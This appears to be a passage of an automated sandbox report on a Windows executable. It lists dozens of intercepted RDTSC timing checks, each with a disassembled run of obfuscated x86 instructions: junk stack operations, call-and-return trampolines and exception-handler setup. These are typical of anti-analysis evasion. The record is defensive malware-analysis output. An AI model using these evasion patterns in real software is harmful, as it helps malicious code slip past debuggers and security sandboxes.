                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E902C second address: 12E90AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F15490E9B88h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D29B9h] 0x0000002d mov dword ptr [ebp+122D2301h], ebx 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+1245BF45h] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007F15490E9B88h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 0000001Ah 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 mov ebx, 10DE9079h 0x0000005c pushad 0x0000005d xor bh, 00000028h 0x00000060 adc ah, FFFFFFFEh 0x00000063 popad 0x00000064 xchg eax, esi 0x00000065 pushad 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E90AC second address: 12E90C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jne 00007F1548D0B2F6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f jnc 00007F1548D0B2FEh 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E82E6 second address: 12E82EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA1C7 second address: 12EA252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F1548D0B2F8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 add bx, E491h 0x00000028 or di, 4C23h 0x0000002d xor bl, 0000003Bh 0x00000030 push dword ptr fs:[00000000h] 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F1548D0B2F8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 mov ebx, dword ptr [ebp+122D2AA9h] 0x00000057 mov dword ptr fs:[00000000h], esp 0x0000005e xor edi, 125B18F5h 0x00000064 mov eax, dword ptr [ebp+122D1175h] 0x0000006a mov ebx, dword ptr [ebp+122D2107h] 0x00000070 push FFFFFFFFh 0x00000072 mov bh, DEh 0x00000074 xor dword ptr [ebp+1245B37Bh], esi 0x0000007a nop 0x0000007b push ecx 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB2E7 second address: 12EB2EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA252 second address: 12EA258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC209 second address: 12EC28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F15490E9B97h 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F15490E9B91h 0x00000012 nop 0x00000013 mov bx, dx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F15490E9B88h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F15490E9B88h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 push edx 0x00000053 pop edx 0x00000054 pop ebx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB2EB second address: 12EB2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB2F1 second address: 12EB306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F15490E9B90h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ED21B second address: 12ED287 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a xor ebx, dword ptr [ebp+122D2A11h] 0x00000010 mov bh, FAh 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 pushad 0x00000016 sbb edx, 6ACAEBA2h 0x0000001c popad 0x0000001d jmp 00007F1548D0B308h 0x00000022 popad 0x00000023 push 00000000h 0x00000025 mov ebx, 07B2C260h 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007F1548D0B302h 0x00000033 jmp 00007F1548D0B308h 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC407 second address: 12EC48A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a xor di, 6D7Ch 0x0000000f jmp 00007F15490E9B93h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push edi 0x0000001c push ebx 0x0000001d mov bl, 94h 0x0000001f pop edi 0x00000020 pop ebx 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F15490E9B88h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 mov edi, ebx 0x00000044 mov dword ptr [ebp+122D3031h], ebx 0x0000004a xor ebx, dword ptr [ebp+122D2A95h] 0x00000050 mov eax, dword ptr [ebp+122D0CA9h] 0x00000056 mov edi, eax 0x00000058 push FFFFFFFFh 0x0000005a mov bl, A8h 0x0000005c mov edi, dword ptr [ebp+122D2AE9h] 0x00000062 nop 0x00000063 jbe 00007F15490E9B90h 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c pop eax 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE2B8 second address: 12EE2BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE4AC second address: 12EE4CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F15490E9B94h 0x00000010 jmp 00007F15490E9B8Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F0303 second address: 12F035A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2A71h] 0x00000010 push 00000000h 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D201Ah], edx 0x00000019 popad 0x0000001a push 00000000h 0x0000001c call 00007F1548D0B308h 0x00000021 ja 00007F1548D0B2F8h 0x00000027 pop ebx 0x00000028 xchg eax, esi 0x00000029 push ebx 0x0000002a jno 00007F1548D0B2FCh 0x00000030 pop ebx 0x00000031 push eax 0x00000032 jl 00007F1548D0B304h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F035A second address: 12F035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EF4F6 second address: 12EF5AA instructions: 0x00000000 rdtsc 0x00000002 je 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F1548D0B302h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 xor ebx, dword ptr [ebp+122D2C79h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F1548D0B2F8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c movsx ebx, di 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007F1548D0B2F8h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 mov edi, ebx 0x00000062 mov eax, dword ptr [ebp+122D0E71h] 0x00000068 mov edi, dword ptr [ebp+1245C271h] 0x0000006e push FFFFFFFFh 0x00000070 add dword ptr [ebp+122D1BB1h], edi 0x00000076 nop 0x00000077 js 00007F1548D0B304h 0x0000007d push eax 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F1548D0B2FAh 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128D84A second address: 128D850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128D850 second address: 128D859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4CE3 second address: 12F4D04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15490E9B96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4D04 second address: 12F4D8F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F1548D0B2F8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 adc ebx, 41FCFE11h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F1548D0B2F8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov ebx, dword ptr [ebp+122D2C55h] 0x0000004e mov dword ptr [ebp+1245B36Dh], esi 0x00000054 push 00000000h 0x00000056 call 00007F1548D0B303h 0x0000005b adc bx, 50E7h 0x00000060 pop edi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jc 00007F1548D0B2FCh 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4D8F second address: 12F4D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4D93 second address: 12F4D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3E7B second address: 12F3E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4F05 second address: 12F4F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3E7F second address: 12F3E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F901C second address: 12F9021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9021 second address: 12F9026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F70B4 second address: 12F70B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F926C second address: 12F9270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9270 second address: 12F9276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE3BC second address: 12FE3D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301F17 second address: 1301F41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F1548D0B2FCh 0x00000010 push eax 0x00000011 jng 00007F1548D0B2F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130159B second address: 13015A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13015A7 second address: 13015AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13016E9 second address: 1301709 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F15490E9B92h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301709 second address: 130170D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301896 second address: 13018A6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13018A6 second address: 13018AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13018AC second address: 13018B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13018B2 second address: 13018B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13018B7 second address: 13018D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15490E9B90h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F15490E9B86h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13018D6 second address: 13018E0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1548D0B2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C8E6 second address: 130C8F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F15490E9B86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312AA8 second address: 1312AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312AAE second address: 1312AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15490E9B8Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12977AA second address: 12977AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131193A second address: 131193E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131193E second address: 1311942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5E28 second address: 12E5E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5F3E second address: 12E5F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6316 second address: 12E6320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F15490E9B86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6426 second address: 12E642B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E642B second address: 12E643D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jo 00007F15490E9B86h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E643D second address: 1121B24 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1548D0B2FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D3522h], ebx 0x00000011 push dword ptr [ebp+122D09C5h] 0x00000017 mov di, D0BFh 0x0000001b call dword ptr [ebp+122D3895h] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D282Dh], eax 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D1FDFh], ebx 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 cmc 0x00000035 pushad 0x00000036 sub dword ptr [ebp+122D1FDFh], edi 0x0000003c movsx esi, bx 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D2B15h], eax 0x00000046 sub dword ptr [ebp+122D285Bh], eax 0x0000004c mov esi, 0000003Ch 0x00000051 jmp 00007F1548D0B2FEh 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a mov dword ptr [ebp+122D282Dh], ecx 0x00000060 lodsw 0x00000062 cld 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D1B96h], eax 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D1B96h], eax 0x00000077 nop 0x00000078 pushad 0x00000079 push eax 0x0000007a jc 00007F1548D0B2F6h 0x00000080 pop eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F1548D0B305h 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E64BD second address: 12E64C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E64C1 second address: 12E6526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007F1548D0B2F8h 0x0000000f jmp 00007F1548D0B307h 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push ebx 0x0000001a push edi 0x0000001b jo 00007F1548D0B2F6h 0x00000021 pop edi 0x00000022 pop ebx 0x00000023 mov eax, dword ptr [eax] 0x00000025 ja 00007F1548D0B30Eh 0x0000002b jmp 00007F1548D0B308h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 jne 00007F1548D0B2F6h 0x0000003d pop edi 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E677F second address: 12E6785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E687F second address: 12E6885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6885 second address: 12E6889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E69C0 second address: 12E69C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6DDF second address: 12E6E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F15490E9B8Eh 0x00000011 nop 0x00000012 mov edx, dword ptr [ebp+122D289Bh] 0x00000018 push 0000001Eh 0x0000001a mov dx, B337h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F15490E9B99h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6E22 second address: 12E6E3C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1548D0B2FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c ja 00007F1548D0B2FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7142 second address: 12E7146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7146 second address: 12E7156 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7233 second address: 12E7241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7241 second address: 12E7294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1548D0B304h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 xor dword ptr [ebp+122D1BFDh], edi 0x00000016 lea eax, dword ptr [ebp+12497B31h] 0x0000001c jmp 00007F1548D0B307h 0x00000021 jc 00007F1548D0B2F6h 0x00000027 nop 0x00000028 pushad 0x00000029 pushad 0x0000002a jl 00007F1548D0B2F6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7294 second address: 12E72A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F15490E9B86h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311D77 second address: 1311D91 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1548D0B2F6h 0x00000008 jmp 00007F1548D0B2FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311D91 second address: 1311DC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F15490E9B96h 0x0000000d jl 00007F15490E9B9Dh 0x00000013 jmp 00007F15490E9B91h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
